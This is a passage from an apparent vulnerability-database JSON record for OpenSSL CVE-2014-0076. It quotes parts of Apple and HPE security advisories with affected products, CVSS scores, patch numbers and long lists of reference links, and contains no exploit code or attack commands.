Descriptor Table was\nallocated at a predictable address. This issue was addressed through\nalways allocating the Global Descriptor Table at random addresses. \nCVE-ID\nCVE-2014-4403 : Ian Beer of Google Project Zero\n\nLibnotify\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with root privileges\nDescription: An out-of-bounds write issue existed in Libnotify. This\nissue was addressed through improved bounds checking\nCVE-ID\nCVE-2014-4381 : Ian Beer of Google Project Zero\n\nOpenSSL\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\nOS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4\nImpact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one\nthat may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in OpenSSL 0.9.8y. \nThis update was addressed by updating OpenSSL to version 0.9.8za. \nCVE-ID\nCVE-2014-0076\nCVE-2014-0195\nCVE-2014-0221\nCVE-2014-0224\nCVE-2014-3470\n\nQT Media Foundation\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\nOS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4\nImpact: Playing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the handling of\nRLE encoded movie files. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2014-1391 : Fernando Munoz working with iDefense VCP, Tom\nGallagher \u0026 Paul Bates working with HP\u0027s Zero Day Initiative\n\nQT Media Foundation\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\nOS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4\nImpact: Playing a maliciously crafted MIDI file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A buffer overflow existed in the handling of MIDI\nfiles. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2014-4350 : s3tm3m working with HP\u0027s Zero Day Initiative\n\nQT Media Foundation\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\nOS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4\nImpact: Playing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the handling of\nthe \u0027mvhd\u0027 atoms. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2014-4979 : Andrea Micalizzi aka rgod working with HP\u0027s Zero Day\nInitiative\n\nruby\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: A remote attacker may be able to cause arbitrary code\nexecution\nDescription: A heap buffer overflow existed in LibYAML\u0027s handling of\npercent-encoded characters in a URI. This issue was addressed through\nimproved bounds checking. This update addresses the issues by\nupdating LibYAML to version 0.1.6\nCVE-ID\nCVE-2014-2525\n\n\nNote: OS X Mavericks 10.9.5 includes the security content of\nSafari 7.0.6: http://support.apple.com/kb/HT6367\n\nOS X Mavericks v10.9.5 and Security Update 2014-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJUGkP0AAoJEBcWfLTuOo7tygQP/1vHYXtWy6492Tjj6ycymWa+\nCt0eCCBU/AUi5ODNDeV9ddWkuFeXKbgQSHoPU19IPcIBAKnYUupVJSJ/cEHfSthh\nCiROjJw8Bt8comn04BgggHieLveN1xQCXQDcO29kBIpQr394XKS0lNXP//Z0oG5V\nsCnEDPz/0R92mwT5XkKD9WC7G/WjybS5V7BjEbdzDOn4qdTVje05xI5pof+fkeQ1\nhFHo7uTCDkSzLH2YxrQHifNVyItz8AgnNHwH7zc6XmNtiNFkiFP/KU6BYyr8WiTQ\nJb3pyLB/Xvmbd0kuETnDNvV0oJc88G38a++xZPnuM7zQrW/TQkkKQpiqKtYAiJuw\nZhUoky620/7HULegcYtsTyuDFyEN6whdSmHLFCJzk2oZXZ7MPA8ywCFB8Y79rohW\n5MTe/zVUSxxYBgVXpkmhPwXYSTINeUJGJA1RQtXhC2Hh6O2jeqJP2H0hTmgsCBRA\n3X/2CGoyAAgoKTJwgXk07tBbJWf+wQwAvUN9L1Yph+uOvvUzqFt8LNEGw9jVPsZl\nQHcSEW/Ef/HK/OLwVZiPqse6lRJAdRZl5//vm4408jnXfJCy6KnvxcsO4Z1yTyoP\nkCXdWlSLBiidcRRWBfoQBSC3gANcx9a56ItWieEvJrdNOiyhb+gqEk7XraOlb/gf\nk4w2RKNm0Fv+kdNoFAnd\n=gpVc\n-----END PGP SIGNATURE-----\n\n. These vulnerabilities include: \n\n* The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \n\n - HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2010-5298\n 4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\n 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)\n\n CVE-2014-0076\n 4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2014-0195\n 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0198\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0221\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0224\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-3470\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-3566\n 3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\n 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2016-0705\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE recommends applying the following software updates to resolve the\nvulnerabilities in the impacted versions of HPE StoreVirtual products running\nHPE LeftHand OS. \n\nLeftHand OS v11.5 - Patches 45019-00 and 45020 \nLeftHand OS v12.0 - Patches 50016-00 and 50017-00 \nLeftHand OS v12.5 - Patch 55016-00 \nLeftHand OS v12.6 - Patch 56002-00 \n\n**Notes:**\n\nThese patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision\nto OpenSSL v1.0.1e 48. \nThese patches migrate Certificate Authority Hashing Algorithm from a weak\nhashing algorithm SHA1 to the stronger hashing algorithm SHA256", "sources": [ { "db": "NVD", "id": "CVE-2014-0076" }, { "db": "BID", "id": "66363" }, { "db": "PACKETSTORM", "id": "126087" }, { "db": "PACKETSTORM", "id": "126097" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "126228" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "VULMON", "id": "CVE-2014-0076" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127607" }, { "db": "PACKETSTORM", "id": "128315" }, { "db": "PACKETSTORM", "id": "140720" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0076", "trust": 2.9 }, { "db": "BID", "id": "66363", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10075", "trust": 1.4 }, { "db": "SECUNIA", "id": "59300", "trust": 1.1 }, { "db": "SECUNIA", "id": "59450", "trust": 1.1 }, { "db": "SECUNIA", "id": "59364", "trust": 1.1 }, { "db": "SECUNIA", "id": "59040", "trust": 1.1 }, { "db": "SECUNIA", "id": "59490", "trust": 1.1 }, { "db": "SECUNIA", "id": "59495", "trust": 1.1 }, { "db": "SECUNIA", "id": "59374", "trust": 1.1 }, { "db": "SECUNIA", "id": "59175", "trust": 1.1 }, { "db": "SECUNIA", "id": "59454", "trust": 1.1 }, { "db": "SECUNIA", "id": "59445", "trust": 1.1 }, { "db": "SECUNIA", "id": "59264", "trust": 1.1 }, { "db": "SECUNIA", "id": "58492", "trust": 1.1 }, { "db": "SECUNIA", "id": "59721", "trust": 1.1 }, { "db": "SECUNIA", "id": "59655", "trust": 1.1 }, { "db": "SECUNIA", "id": "60571", "trust": 1.1 }, { "db": "SECUNIA", "id": "58727", "trust": 1.1 }, { "db": "SECUNIA", "id": "58939", "trust": 1.1 }, { "db": "SECUNIA", "id": "59162", "trust": 1.1 }, { "db": "SECUNIA", "id": "59514", "trust": 1.1 }, { "db": "SECUNIA", "id": "59413", "trust": 1.1 }, { "db": "SECUNIA", "id": "59438", "trust": 1.1 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "MCAFEE", "id": "SB10071", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-0076", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128315", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127607", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127362", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127213", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127266", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127608", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140720", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127086", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126228", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126961", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127265", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128001", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126097", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126087", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0076" }, { "db": "BID", "id": "66363" }, { "db": "PACKETSTORM", "id": "128315" }, { "db": "PACKETSTORM", "id": "127607" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126228" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126097" }, { "db": "PACKETSTORM", "id": "126087" }, { "db": "NVD", "id": "CVE-2014-0076" } ] }, "id": "VAR-201403-0514", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.408460395 }, "last_update_date": "2024-07-23T20:28:55.089000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Debian Security Advisories: DSA-2908-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=438bf64e25a46a5ac11098b5720d1bb6" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2165-1" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0076", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1fc1fc75c3cab4aa04eb437a09a1da4f" }, { "title": "Red Hat: CVE-2014-0076", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0076" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/uvhw/uvhw.bitcoin.js " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/second-nsa-crypto-tool-found-in-rsa-bsafe/105143/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0076" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0076" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 1.4, "url": "http://eprint.iacr.org/2014/140" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 1.4, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676501" }, { "trust": 1.2, "url": "http://advisories.mageia.org/mgasa-2014-0165.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/66363" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 1.1, "url": "https://bugzilla.novell.com/show_bug.cgi?id=869945" }, { "trust": 1.1, "url": "https://bugs.gentoo.org/show_bug.cgi?id=505278" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:067" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676424" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58727" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015300" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59495" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015264" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.1, "url": "http://support.apple.com/kb/ht6443" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676092" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59454" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59445" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59374" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59364" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59264" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59175" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59040" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58492" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2165-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-04/msg00007.html" }, { "trust": 1.1, "url": "http://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=2198be3483259de374f91e57d247d0fc667aef29" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.8, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0076_cryptographic_issues" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095202" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095218" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3bf6e25d1260a4de686257cc100631528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3824bd213d0f7c3d086257cc10063152c" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl5" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_aix_is_affected_by_a_vulnerability_in_openssl_cve_2014_0160?lang=en_us" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095187" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670738" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095124" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004581" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004611" }, { "trust": 0.3, "url": "http://www.freebsd.org/security/advisories/freebsd-sa-14:06.openssl.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020681" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": 